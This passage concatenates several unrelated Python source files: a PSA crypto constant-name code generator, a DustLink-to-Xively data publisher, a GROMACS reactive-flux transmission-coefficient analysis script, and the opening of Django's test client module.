(up to non-significant whitespace) and skips all non-matching lines.
"""
# pylint: disable=too-many-branches
m = re.match(self._define_directive_re, line)
if not m:
return
name, parameter, expansion = m.groups()
expansion = re.sub(r'/\*.*?\*/|//.*', r' ', expansion)
if re.match(self._deprecated_definition_re, expansion):
# Skip deprecated values, which are assumed to be
# backward compatibility aliases that share
# numerical values with non-deprecated values.
return
if name.endswith('_FLAG') or name.endswith('MASK'):
# Macro only to build actual values
return
elif (name.startswith('PSA_ERROR_') or name == 'PSA_SUCCESS') \
and not parameter:
self.statuses.add(name)
elif name.startswith('PSA_KEY_TYPE_') and not parameter:
self.key_types.add(name)
elif name.startswith('PSA_KEY_TYPE_') and parameter == 'curve':
self.key_types_from_curve[name] = name[:13] + 'IS_' + name[13:]
elif name.startswith('PSA_KEY_TYPE_') and parameter == 'group':
self.key_types_from_group[name] = name[:13] + 'IS_' + name[13:]
elif name.startswith('PSA_ECC_FAMILY_') and not parameter:
self.ecc_curves.add(name)
elif name.startswith('PSA_DH_FAMILY_') and not parameter:
self.dh_groups.add(name)
elif name.startswith('PSA_ALG_') and not parameter:
if name in ['PSA_ALG_ECDSA_BASE',
'PSA_ALG_RSA_PKCS1V15_SIGN_BASE']:
# Ad hoc skipping of duplicate names for some numerical values
return
self.algorithms.add(name)
# Ad hoc detection of hash algorithms
if re.search(r'0x020000[0-9A-Fa-f]{2}', expansion):
self.hash_algorithms.add(name)
# Ad hoc detection of key agreement algorithms
if re.search(r'0x09[0-9A-Fa-f]{2}0000', expansion):
self.ka_algorithms.add(name)
elif name.startswith('PSA_ALG_') and parameter == 'hash_alg':
if name in ['PSA_ALG_DSA', 'PSA_ALG_ECDSA']:
# A naming irregularity
tester = name[:8] + 'IS_RANDOMIZED_' + name[8:]
else:
tester = name[:8] + 'IS_' + name[8:]
self.algorithms_from_hash[name] = tester
elif name.startswith('PSA_KEY_USAGE_') and not parameter:
self.key_usages.add(name)
else:
# Other macro without parameter
return
_nonascii_re = re.compile(rb'[^\x00-\x7f]+')
_continued_line_re = re.compile(rb'\\\r?\n\Z')
def read_file(self, header_file):
for line in header_file:
m = re.search(self._continued_line_re, line)
while m:
cont = next(header_file)
line = line[:m.start(0)] + cont
m = re.search(self._continued_line_re, line)
line = re.sub(self._nonascii_re, rb'', line).decode('ascii')
self.read_line(line)
@staticmethod
def _make_return_case(name):
return 'case %(name)s: return "%(name)s";' % {'name': name}
@staticmethod
def _make_append_case(name):
template = ('case %(name)s: '
'append(&buffer, buffer_size, &required_size, "%(name)s", %(length)d); '
'break;')
return template % {'name': name, 'length': len(name)}
@staticmethod
def _make_bit_test(var, flag):
return BIT_TEST_TEMPLATE % {'var': var,
'flag': flag,
'length': len(flag)}
def _make_status_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.statuses)))
def _make_ecc_curve_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.ecc_curves)))
def _make_dh_group_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.dh_groups)))
def _make_key_type_cases(self):
return '\n '.join(map(self._make_append_case,
sorted(self.key_types)))
@staticmethod
def _make_key_type_from_curve_code(builder, tester):
return KEY_TYPE_FROM_CURVE_TEMPLATE % {'builder': builder,
'builder_length': len(builder),
'tester': tester}
@staticmethod
def _make_key_type_from_group_code(builder, tester):
return KEY_TYPE_FROM_GROUP_TEMPLATE % {'builder': builder,
'builder_length': len(builder),
'tester': tester}
def _make_ecc_key_type_code(self):
d = self.key_types_from_curve
make = self._make_key_type_from_curve_code
return ''.join([make(k, d[k]) for k in sorted(d.keys())])
def _make_dh_key_type_code(self):
d = self.key_types_from_group
make = self._make_key_type_from_group_code
return ''.join([make(k, d[k]) for k in sorted(d.keys())])
def _make_hash_algorithm_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.hash_algorithms)))
def _make_ka_algorithm_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.ka_algorithms)))
def _make_algorithm_cases(self):
return '\n '.join(map(self._make_append_case,
sorted(self.algorithms)))
@staticmethod
def _make_algorithm_from_hash_code(builder, tester):
return ALGORITHM_FROM_HASH_TEMPLATE % {'builder': builder,
'builder_length': len(builder),
'tester': tester}
def _make_algorithm_code(self):
d = self.algorithms_from_hash
make = self._make_algorithm_from_hash_code
return ''.join([make(k, d[k]) for k in sorted(d.keys())])
def _make_key_usage_code(self):
return '\n'.join([self._make_bit_test('usage', bit)
for bit in sorted(self.key_usages)])
def write_file(self, output_file):
"""Generate the pretty-printer function code from the gathered
constant definitions.
"""
data = {}
data['status_cases'] = self._make_status_cases()
data['ecc_curve_cases'] = self._make_ecc_curve_cases()
data['dh_group_cases'] = self._make_dh_group_cases()
data['key_type_cases'] = self._make_key_type_cases()
data['key_type_code'] = (self._make_ecc_key_type_code() +
self._make_dh_key_type_code())
data['hash_algorithm_cases'] = self._make_hash_algorithm_cases()
data['ka_algorithm_cases'] = self._make_ka_algorithm_cases()
data['algorithm_cases'] = self._make_algorithm_cases()
data['algorithm_code'] = self._make_algorithm_code()
data['key_usage_code'] = self._make_key_usage_code()
output_file.write(OUTPUT_TEMPLATE % data)
def generate_psa_constants(header_file_names, output_file_name):
collector = MacroCollector()
for header_file_name in header_file_names:
with open(header_file_name, 'rb') as header_file:
collector.read_file(header_file)
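    # Write to a temporary file first, then rename over the target, so that a
    # partially written file is never left in place if generation fails.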
temp_file_name = output_file_name + '.tmp'
with open(temp_file_name, 'w') as output_file:
collector.write_file(output_file)
os.replace(temp_file_name, output_file_name)
if __name__ == '__main__':
if not os.path.isdir('programs') and os.path.isdir('../programs'):
os.chdir('..')
    # Allow changing the directory that psa_constant_names_generated.c is written to.
OUTPUT_FILE_DIR = sys.argv[1] if len(sys.argv) == 2 else "programs/psa"
generate_psa_constants(['include/psa/crypto_values.h',
'include/psa/crypto_extra.h'],
OUTPUT_FILE_DIR + '/psa_constant_names_generated.c')
|
|
#!/usr/bin/python
import logging
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('XivelySyncEngine')
log.setLevel(logging.ERROR)
log.addHandler(NullHandler())
import time
import copy
import threading
from pydispatch import dispatcher
from EventBus import EventBusClient
from DustLinkData import DustLinkData
from SmartMeshSDK import FormatUtils
from SmartMeshSDK.protocols.xivelyConnector import xivelyConnector
class XivelySyncEngine(EventBusClient.EventBusClient):
    CHECKDELAY = 5 # in s, delay between checks that an API key is set
def __init__(self):
# log
log.info('creating instance')
# store params
# local variables
self.connector = None
self.lastCheck = None
self.xivelyApiKey = None
self.subscribedMotes = []
self.statusLock = threading.Lock()
self.status = {}
self.status['apiKeySet'] = 'WAIT...'
self.status['status'] = 'DISCONNECTED'
self.status['numConnectionsOK'] = 0
self.status['numConnectionsFailed'] = 0
self.status['numSubscriptionsFailed'] = 0
self.status['lastConnected'] = None
self.status['lastDisconnected'] = None
self.status['numPublishedOK'] = 0
self.status['numPublishedFail'] = 0
# initialize parent class
EventBusClient.EventBusClient.__init__(self,
signal = 'newDataMirrored',
cb = self._publish,
teardown_cb = self._cleanup,
)
self.name = 'DataConnector_xivelyConnector'
# connect extra events
dispatcher.connect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
# add stats
#======================== public ==========================================
def getStatus(self):
with self.statusLock:
return copy.deepcopy(self.status)
#======================== private =========================================
def _cleanup(self):
# disconnect extra events
dispatcher.disconnect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
def _publish(self,sender,signal,data):
now = time.time()
dld = DustLinkData.DustLinkData()
mac = data['mac']
#========== connect/disconnect
if (self.lastCheck==None) or (now-self.lastCheck>self.CHECKDELAY):
# remember I just checked
self.lastCheck = now
# we need to use "raw" access because dld.getPublisherSettings()
# does not return all settings
settings = dld.get(['system','publishers','xively'])
# record the xivelyApiKey
xivelyApiKey = None
if ('xivelyApiKey' in settings) and settings['xivelyApiKey']:
xivelyApiKey = settings['xivelyApiKey']
# update status
if xivelyApiKey==None:
with self.statusLock:
self.status['apiKeySet'] = 'NO'
else:
with self.statusLock:
self.status['apiKeySet'] = 'YES'
# decide whether to connect/disconnect
if (not self.connector) and xivelyApiKey:
# connect
# log
log.info("Connecting to Xively")
# remember API key
self.xivelyApiKey = xivelyApiKey
# connect
try:
self.connector = xivelyConnector.xivelyConnector(
apiKey = self.xivelyApiKey,
productName = 'SmartMesh IP Starter Kit',
productDesc = 'Connecting using DustLink',
)
except Exception as err:
# log
log.error("Error while connecting to Xively: {0}".format(err))
# update status
with self.statusLock:
self.status['status'] = 'CONNECTION FAILED'
self.status['numConnectionsFailed']+= 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['status'] = 'CONNECTED'
self.status['numConnectionsOK'] += 1
self.status['lastConnected'] = dld.timestampToStringShort(now)
elif ((self.connector) and (not xivelyApiKey)) or (self.xivelyApiKey!=xivelyApiKey):
# disconnect
self._disconnect()
#========== publish data
if self.connector:
try:
self.connector.publish(
mac = data['mac'],
datastream = data['type'],
value = data['lastvalue'],
)
except Exception as err:
# log
log.error(
"Error while publishing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
data['type'],
err,
)
)
# update status
with self.statusLock:
self.status['numPublishedFail'] += 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['numPublishedOK'] += 1
#========== subscribe
if self.connector:
if mac not in self.subscribedMotes:
try:
if ('subscribeToLed' in data) and (data['subscribeToLed']):
# create datastream
self.connector.publish(
mac = mac,
datastream = 'led',
value = 0,
)
# subscribe
self.connector.subscribe(
mac = mac,
datastream = 'led',
callback = self._led_cb,
)
except Exception as err:
# log
log.error(
"Error while subscribing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
'led',
err,
)
)
# update status
with self.statusLock:
self.status['status'] = 'SUBSCRIPTION FAILED'
self.status['numSubscriptionsFailed'] += 1
# disconnect
self._disconnect()
else:
self.subscribedMotes += [mac]
def _disconnect(self):
now = time.time()
dld = DustLinkData.DustLinkData()
# log
log.info("Disconnecting from Xively")
# close connector
try:
self.connector.close()
except Exception:
pass # happens when no active subscription
# reset variables
self.connector = None
self.xivelyApiKey = None
self.subscribedMotes = []
# update status
with self.statusLock:
self.status['status'] = 'DISCONNECTED'
self.status['lastDisconnected'] = dld.timestampToStringShort(now)
def _led_cb(self,mac,datastream,value):
# all non-0 values turn LED on
if value==0:
value = 0
else:
value = 1
dispatcher.send(
signal = 'fieldsToMesh_OAPLED',
data = {
'mac': mac,
'fields': {
'status': value,
},
}
)
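# Illustrative sketch (hypothetical, not part of this module): other DustLink
# components can poll the engine's status through the 'xivelystatus' signal
# wired up in __init__, e.g.
#
#   from pydispatch import dispatcher
#   responses = dispatcher.send(signal='xivelystatus')
#   # responses is a list of (receiver, statusDict) pairs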
|
|
#!/afs/crc.nd.edu/x86_64_linux/python/3.4.0/gcc-4.8.0/bin/python3
''' reactive_flux.py - Calculates the normalized reactive flux, k(t),
from a set of GROMACS simulations started at the maximum of the
free energy barrier. Currently supports bimolecular reactions.
'''
import os
import numpy as np
import math
import sys
import time
# Heaviside step function; for the first frame (i == 0) the sign of the
# initial velocity rdz is used in place of arg.
def heavyside(arg, i=1, rdz=1):
if i == 0:
if rdz >= 0:
return 1.0
else:
return 0.0
if arg >= 0:
return 1.0
if arg < 0:
return 0.0
def list_divide(list1, list2):
final_list = []
for i in range(0, len(list1)):
if list2[i] == 0:
final_list.append(0)
else:
final_list.append(list1[i]/list2[i])
return final_list
def list_subtract(list1, list2):
final_list = []
for i in range(0, len(list1)):
final_list.append(list1[i] - list2[i])
return final_list
# Applies the minimum-image convention to a displacement vector, using the
# global box dimensions boxx, boxy, boxz (read from the .gro file below).
def minimage(x, y, z):
if x > boxx/2.0:
x -= boxx
elif x < -boxx/2.0:
x += boxx
if y > boxy/2.0:
y -= boxy
elif y < -boxy/2.0:
y += boxy
if z > boxz/2.0:
z -= boxz
elif z < -boxz/2.0:
z += boxz
return [x, y, z]
def covariance(A, B):
'''Calculates the covariance between two data sets.'''
# Calculate the mean of A and B, respectively
muA = np.mean(A)
muB = np.mean(B)
# Calculate covariance.
cov = 0
N = len(A)
for eA, eB in zip(A, B):
cov += ((eA-muA)*(eB-muB))/N
return cov
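# Quick check (illustrative): this is the population covariance, matching
# np.cov with bias=True, e.g.
#   A = [1., 2., 3.]; B = [2., 4., 6.]
#   covariance(A, B)               # -> 4/3
#   np.cov(A, B, bias=True)[0][1]  # -> 4/3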
def chi(backwards, tsloc):
'''Checks if the backwards trajectory recrosses the TS.'''
chilist = []
recrossed = False
for value in backwards:
if recrossed == True:
chilist.append(0)
else:
this_dist = float(value.split()[1])
if this_dist > tsloc:
chilist.append(0)
recrossed = True
else:
chilist.append(1)
return chilist
# Check if we want a special RF function
runtype = ''
if len(sys.argv) in (2, 3):
    runtype = sys.argv[1]
    print(runtype)
## Data structure initialization
num_frames = 600
num_simulations = 2000
ktnum = [0 for i in range(0, num_frames+1)]
ktnum2 = [0 for i in range(0, num_frames+1)]
ktden = [0 for i in range(0, num_frames+1)]
timelist = np.linspace(0.000, 3.000, num_frames).tolist()
lastnums = []
lastdens = []
# Get box size.
boxlines = open('1/nvt1.gro', 'r').readlines()
box = boxlines[-1].split()
boxx = float(box[0])
boxy = float(box[1])
boxz = float(box[2])
print("Detected box {0}, {1}, {2}".format(boxx, boxy, boxz))
tslocs = []
if runtype == '':
print("Calculating the Bennett-Chandler transmission coefficient.")
for sim in range (1, num_simulations+1):
sys.stdout.write("\rAnalyzing simulation {0}/{1}...".format(sim, num_simulations))
sys.stdout.flush()
for i in range(0,2):
if i == 0: # forwards
with open("{0}/distanceu.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancel.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityu.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocityl.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/dist.xvg".format(sim), "r") as f:
distfile = f.readlines()
elif i == 1: # reverse
with open("{0}/distanceur.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancelr.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityur.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocitylr.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/distr.xvg".format(sim), "r") as f:
distfile = f.readlines()
# Get r
tsloc = float(distfile[15].split()[1])
tslocs.append(tsloc)
# Get COM of U, L
UCOM = float(udistfile[24].split()[1]), float(udistfile[24].split()[2]), float(udistfile[24].split()[3])
LCOM = float(ldistfile[24].split()[1]), float(ldistfile[24].split()[2]), float(ldistfile[24].split()[3])
# Get COV of U, L
UCOV = float(uvelofile[24].split()[1]), float(uvelofile[24].split()[2]), float(uvelofile[24].split()[3])
LCOV = float(lvelofile[24].split()[1]), float(lvelofile[24].split()[2]), float(lvelofile[24].split()[3])
# Calculate dx, dy, dz
dx, dy, dz = minimage(UCOM[0]-LCOM[0], UCOM[1]-LCOM[1], UCOM[2]-LCOM[2])
# Calculate dvx, dvy, dvz
dvx = UCOV[0]-LCOV[0]
dvy = UCOV[1]-LCOV[1]
dvz = UCOV[2]-LCOV[2]
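            # rdot(0) is the relative COM velocity projected onto the
            # separation vector: rdot = (dr . dv) / |dr|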
rdotzero = (dx*dvx + dy*dvy + dz*dvz)/(dx**2+dy**2+dz**2)**0.5
#print('New Rdotzero: {0}'.format(rdotzero))
#rdotzero = (distance2-tsloc)/0.005
#print('Old Rdotzero (finite difference): {0}'.format(rdotzero))
hs_rdotzero = heavyside(rdotzero)
# And loop over all distances:
i = 0
for line in distfile[15:]:
this_line = line.split()
distance = float(this_line[1])
hs_rt_ts_loc = heavyside(distance - tsloc, i, rdotzero)
# Calculate k(t) for that frame, append to lists
ktnum[i] += (rdotzero*hs_rt_ts_loc)
ktden[i] += (rdotzero*hs_rdotzero)
i += 1
print("Analysis finished. Producing final reactive flux function, kbc(t).")
# Produce k(t) from numerator and denominator lists
kt = list_divide(ktnum, ktden)
print("Transmission Coefficient Estimate: {0}".format(np.mean(kt[-200:])))
print("Saving data.")
save_file = open("data", 'w')
for frame in range(0,num_frames-1):
save_file.write("{0} {1}\n".format(timelist[frame], kt[frame]))
save_file.close()
#with open('tcoeff', 'a') as tcfile:
# tcfile.write(str(np.mean(kt[-200:])))
# tcfile.write('\n')
if runtype == 'bc2':
print("Calculating the Bennett-Chandler 2 transmission coefficient.")
for sim in range (1, num_simulations+1):
sys.stdout.write("\rAnalyzing simulation {0}/{1}...".format(sim, num_simulations))
sys.stdout.flush()
with open("{0}/distanceu.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancel.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityu.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocityl.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/dist.xvg".format(sim), "r") as f:
distfile = f.readlines()
with open("{0}/distr.xvg".format(sim), "r") as f:
distrfile = f.readlines()
# Check to see if the trajectory started at the right location.
# If so, extract rdot(0):
tsloc = float(distfile[15].split()[1])
# Get COM of U, L
UCOM = float(udistfile[24].split()[1]), float(udistfile[24].split()[2]), float(udistfile[24].split()[3])
LCOM = float(ldistfile[24].split()[1]), float(ldistfile[24].split()[2]), float(ldistfile[24].split()[3])
# Get COV of U, L
UCOV = float(uvelofile[24].split()[1]), float(uvelofile[24].split()[2]), float(uvelofile[24].split()[3])
LCOV = float(lvelofile[24].split()[1]), float(lvelofile[24].split()[2]), float(lvelofile[24].split()[3])
# Calculate dx, dy, dz
dx, dy, dz = minimage(UCOM[0]-LCOM[0], UCOM[1]-LCOM[1], UCOM[2]-LCOM[2])
# Calculate dvx, dvy, dvz
dvx = UCOV[0]-LCOV[0]
dvy = UCOV[1]-LCOV[1]
dvz = UCOV[2]-LCOV[2]
rdotzero = (dx*dvx + dy*dvy + dz*dvz)/(dx**2+dy**2+dz**2)**0.5
hs_rdotzero = heavyside(rdotzero)
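        # Sketch of the BC2 estimator accumulated below: the numerator counts
        # a trajectory at time t only if its forward segment is on the product
        # side AND its backward segment is on the reactant side:
        #   k(t) = <rdot(0) * theta(r_f(t) - r_TS) * theta(r_TS - r_b(t))>
        #          / <rdot(0) * theta(rdot(0))>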
# And loop over all distances:
i = 0
for fline, bline in zip(distfile[15:], distrfile[15:]):
this_fline = fline.split()
fdistance = float(this_fline[1])
this_bline = bline.split()
bdistance = float(this_bline[1])
hs_rt_ts_loc = heavyside(fdistance - tsloc, i, rdz=rdotzero)
hs_lt_ts_loc = heavyside(tsloc - bdistance, i, rdz=rdotzero)
# Calculate k(t) for that frame, append to lists
ktnum[i] += rdotzero*hs_rt_ts_loc*hs_lt_ts_loc
ktden[i] += rdotzero*hs_rdotzero
i += 1
# Save last frame of numerator and denominator to a list
lastnums.append(rdotzero*hs_rt_ts_loc*hs_lt_ts_loc)
lastdens.append(rdotzero*hs_rdotzero)
print("Analysis finished. Producing final reactive flux function, kbc2(t).")
# Produce k(t) from numerator and denominator lists
kt = list_divide(ktnum, ktden)
# Calculate transmission coefficient (last frame)
tc = np.mean(kt[-1:])
# Calculate error bars
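    # Propagation of uncertainty for a ratio K = A/B with correlated A and B:
    #   (sigma_K / K)^2 = (sigma_A/A)^2 + (sigma_B/B)^2 - 2*cov(A,B)/(A*B)
    # As written below, sigmaK is the relative error; the EPF branch instead
    # multiplies by k(t) to obtain the absolute error.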
    sigmaK = (((np.std(lastnums)/ktnum[-1])**2) + ((np.std(lastdens)/ktden[-1])**2) - 2*covariance(lastnums, lastdens)/(ktnum[-1]*ktden[-1]))**0.5
sigmafile = open('sigma', 'w')
sigmafile.write(str(sigmaK))
sigmafile.close()
print("Transmission Coefficient Estimate: {0}".format(tc))
print("Saving data.")
save_file = open("databc2", 'w')
for frame in range(0,num_frames-1):
save_file.write("{0} {1}\n".format(timelist[frame], kt[frame]))
save_file.close()
num_file = open('databc2num', 'w')
for frame in range(0, num_frames-1):
num_file.write("{0} {1}\n".format(timelist[frame], ktnum[frame]))
num_file.close()
den_file = open('databc2den', 'w')
for frame in range(0, num_frames-1):
den_file.write("{0} {1}\n".format(timelist[frame], ktden[frame]))
den_file.close()
if runtype == 'pf':
print("Calculating the postive flux (PF) transmission coefficient.")
for sim in range (1, num_simulations+1):
sys.stdout.write("\rAnalyzing simulation {0}/{1}...".format(sim, num_simulations))
sys.stdout.flush()
with open("{0}/distanceu.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancel.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityu.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocityl.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/dist.xvg".format(sim), "r") as f:
distfile = f.readlines()
with open("{0}/distr.xvg".format(sim), "r") as f:
distrfile = f.readlines()
        # Extract the transition state location (r at t = 0) from the first frame:
tsloc = float(distfile[15].split()[1])
# Get COM of U, L
UCOM = float(udistfile[24].split()[1]), float(udistfile[24].split()[2]), float(udistfile[24].split()[3])
LCOM = float(ldistfile[24].split()[1]), float(ldistfile[24].split()[2]), float(ldistfile[24].split()[3])
# Get COV of U, L
UCOV = float(uvelofile[24].split()[1]), float(uvelofile[24].split()[2]), float(uvelofile[24].split()[3])
LCOV = float(lvelofile[24].split()[1]), float(lvelofile[24].split()[2]), float(lvelofile[24].split()[3])
# Calculate dx, dy, dz
dx, dy, dz = minimage(UCOM[0]-LCOM[0], UCOM[1]-LCOM[1], UCOM[2]-LCOM[2])
# Calculate dvx, dvy, dvz
dvx = UCOV[0]-LCOV[0]
dvy = UCOV[1]-LCOV[1]
dvz = UCOV[2]-LCOV[2]
rdotzero = (dx*dvx + dy*dvy + dz*dvz)/(dx**2+dy**2+dz**2)**0.5
hs_rdotzero = heavyside(rdotzero)
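        # Sketch of the PF estimator accumulated below: separate positive-flux
        # correlation functions for the forward and backward trajectories,
        # subtracted after the simulation loop:
        #   k(t) = <rdot * theta(rdot) * theta(r_f(t) - r_TS)> / <rdot * theta(rdot)>
        #        - <rdot * theta(rdot) * theta(r_b(t) - r_TS)> / <rdot * theta(rdot)>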
        chilist = chi(distrfile[15:], tsloc)  # computed as in the EPF branch; not used by the PF estimator below
# And loop over all distances:
i = 0
for fline, bline in zip(distfile[15:], distrfile[15:]):
this_fline = fline.split()
fdistance = float(this_fline[1])
this_bline = bline.split()
bdistance = float(this_bline[1])
hs_rt_ts_loc = heavyside(fdistance - tsloc, i, rdz=rdotzero)
hs_lt_ts_loc = heavyside(bdistance - tsloc, i, rdz=rdotzero)
# Calculate k(t) for that frame, append to lists
ktnum[i] += (rdotzero*hs_rdotzero*hs_rt_ts_loc)
ktnum2[i] += (rdotzero*hs_rdotzero*hs_lt_ts_loc)
ktden[i] += (rdotzero*hs_rdotzero)
i += 1
print("Analysis finished. Producing final reactive flux function, kpf(t).")
# Produce k(t) from numerator and denominator lists
kt1 = list_divide(ktnum, ktden)
kt2 = list_divide(ktnum2, ktden)
kt = list_subtract(kt1, kt2)
print("Transmission Coefficient Estimate: {0}".format(np.mean(kt[-200:])))
print("Saving data.")
save_file = open("datapf", 'w')
for frame in range(0,num_frames-1):
        save_file.write("{0} {1}\n".format(timelist[frame], kt[frame]))
    save_file.close()
rdotzeros = []
if runtype == 'epf':
print("Calculating the transmission coefficient via the effective positive flux (EPF) algorithm [RECOMMENDED].")
for sim in range (1, num_simulations+1):
sys.stdout.write("\rAnalyzing simulation {0}/{1}...".format(sim, num_simulations))
sys.stdout.flush()
with open("{0}/distanceu.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancel.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityu.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocityl.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/dist.xvg".format(sim), "r") as f:
distfile = f.readlines()
with open("{0}/distr.xvg".format(sim), "r") as f:
distrfile = f.readlines()
        # Extract the transition state location (r at t = 0) from the first frame:
tsloc = float(distfile[15].split()[1])
# Get COM of U, L
UCOM = float(udistfile[24].split()[1]), float(udistfile[24].split()[2]), float(udistfile[24].split()[3])
LCOM = float(ldistfile[24].split()[1]), float(ldistfile[24].split()[2]), float(ldistfile[24].split()[3])
# Get COV of U, L
UCOV = float(uvelofile[24].split()[1]), float(uvelofile[24].split()[2]), float(uvelofile[24].split()[3])
LCOV = float(lvelofile[24].split()[1]), float(lvelofile[24].split()[2]), float(lvelofile[24].split()[3])
# Calculate dx, dy, dz
dx, dy, dz = minimage(UCOM[0]-LCOM[0], UCOM[1]-LCOM[1], UCOM[2]-LCOM[2])
# Calculate dvx, dvy, dvz
dvx = UCOV[0]-LCOV[0]
dvy = UCOV[1]-LCOV[1]
dvz = UCOV[2]-LCOV[2]
# Calculate rdotzero and its heaviside
rdotzero = (dx*dvx + dy*dvy + dz*dvz)/(dx**2+dy**2+dz**2)**0.5
hs_rdotzero = heavyside(rdotzero)
rdotzeros.append(rdotzero*hs_rdotzero)
        # Calculate the chi function (see the van Erp effective positive flux paper).
chilist = chi(distrfile[15:], tsloc)
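        # Sketch of the EPF estimator accumulated below; chilist[i] weights the
        # forward contribution using the backward trajectory (see chi() above):
        #   k(t) = <rdot(0) * theta(rdot(0)) * chi(t) * theta(r(t) - r_TS)>
        #          / <rdot(0) * theta(rdot(0))>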
# And loop over all distances:
i = 0
for fline in distfile[15:]:
this_fline = fline.split()
fdistance = float(this_fline[1])
hs_rt_ts_loc = heavyside(fdistance - tsloc, i, rdz=rdotzero)
# Calculate k(t) for that frame, append to lists
ktnum[i] += rdotzero*hs_rdotzero*chilist[i]*hs_rt_ts_loc
ktden[i] += rdotzero*hs_rdotzero
i += 1
# Save last frame of numerator and denominator to a list
lastnums.append(rdotzero*hs_rdotzero*chilist[i-1]*hs_rt_ts_loc)
lastdens.append(rdotzero*hs_rdotzero)
print("Analysis finished.")
# Produce k(t) from numerator and denominator lists
kt = list_divide(ktnum,ktden)
# Calculate error bars
sigmaA = np.std(lastnums)
sigmaB = np.std(lastdens)
A = ktnum[-1]/num_simulations
B = ktden[-1]/num_simulations
print("A: {0}".format(A))
print("B: {0}".format(B))
print("sigA: {0}".format(sigmaA))
print("sigB: {0}".format(sigmaB))
sigmaK = kt[-1]*((sigmaA/A)**2 + (sigmaB/B)**2 - (2*covariance(lastnums,lastdens)/(A*B)))**(0.5)
sigmaK = sigmaK/(num_simulations**0.5)
sigmafile = open('sigma', 'w')
sigmafile.write(str(sigmaK))
sigmafile.close()
print("ERROR: {0}".format(sigmaK))
print("Transmission Coefficient: {0}".format(kt[-1]))
print("Saving data.")
save_file = open("transmissioncoefficient", 'w')
for frame in range(0, num_frames-1):
save_file.write("{0} {1}\n".format(timelist[frame], kt[frame]))
save_file.close()
print("wrote.")
print("AVERAGE rdotzerohsrdotzero: {0}".format(np.mean(rdotzeros)))
#num_file = open('databc2num', 'w')
#for frame in range(0, num_frames-1):
# num_file.write("{0} {1}\n".format(timelist[frame], ktnum[frame]))
#num_file.close()
#den_file = open('databc2den', 'w')
#for frame in range(0, num_frames-1):
# den_file.write("{0} {1}\n".format(timelist[frame], ktden[frame]))
#den_file.close()
|
|
from __future__ import unicode_literals
import sys
import os
import re
import mimetypes
from copy import copy
from io import BytesIO
from django.conf import settings
from django.contrib.auth import authenticate, login, logout, get_user_model
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import WSGIRequest
from django.core.signals import (request_started, request_finished,
got_request_exception)
from django.db import close_old_connections
from django.http import SimpleCookie, HttpRequest, QueryDict
from django.template import TemplateDoesNotExist
from django.test import signals
from django.utils.functional import curry
from django.utils.encoding import force_bytes, force_str
from django.utils.http import urlencode
from django.utils.importlib import import_module
from django.utils.itercompat import is_iterable
from django.utils import six
from django.utils.six.moves.urllib.parse import unquote, urlparse, urlsplit
from django.test.utils import ContextList
__all__ = ('Client', 'RequestFactory', 'encode_file', 'encode_multipart')
BOUNDARY = 'BoUnDaRyStRiNg'
MULTIPART_CONTENT = 'multipart/form-data; boundary=%s' % BOUNDARY
CONTENT_TYPE_RE = re.compile('.*; charset=([\w\d-]+);?')
class FakePayload(object):
"""
A wrapper around BytesIO that restricts what can be read since data from
the network can't be seeked and cannot be read outside of its content
length. This makes sure that views can't do anything under the test client
that wouldn't work in Real Life.
"""
def __init__(self, content=None):
self.__content = BytesIO()
self.__len = 0
self.read_started = False
if content is not None:
self.write(content)
def __len__(self):
return self.__len
def read(self, num_bytes=None):
if not self.read_started:
self.__content.seek(0)
self.read_started = True
if num_bytes is None:
num_bytes = self.__len or 0
assert self.__len >= num_bytes, "Cannot read more than the available bytes from the HTTP incoming data."
content = self.__content.read(num_bytes)
self.__len -= num_bytes
return content
def write(self, content):
if self.read_started:
            raise ValueError("Unable to write a payload after it has been read")
content = force_bytes(content)
self.__content.write(content)
self.__len += len(content)
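# Example (sketch): FakePayload behaves like a one-shot request body.
#   payload = FakePayload(b'abc')
#   assert len(payload) == 3
#   payload.read(3)      # returns b'abc'
#   payload.write(b'x')  # raises ValueError once reading has started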
def closing_iterator_wrapper(iterable, close):
try:
for item in iterable:
yield item
finally:
request_finished.disconnect(close_old_connections)
close() # will fire request_finished
request_finished.connect(close_old_connections)
class ClientHandler(BaseHandler):
"""
    An HTTP handler that can be used for testing purposes.
    Uses the WSGI interface to compose requests, but returns
    the raw HttpResponse object.
"""
def __init__(self, enforce_csrf_checks=True, *args, **kwargs):
self.enforce_csrf_checks = enforce_csrf_checks
super(ClientHandler, self).__init__(*args, **kwargs)
def __call__(self, environ):
from django.conf import settings
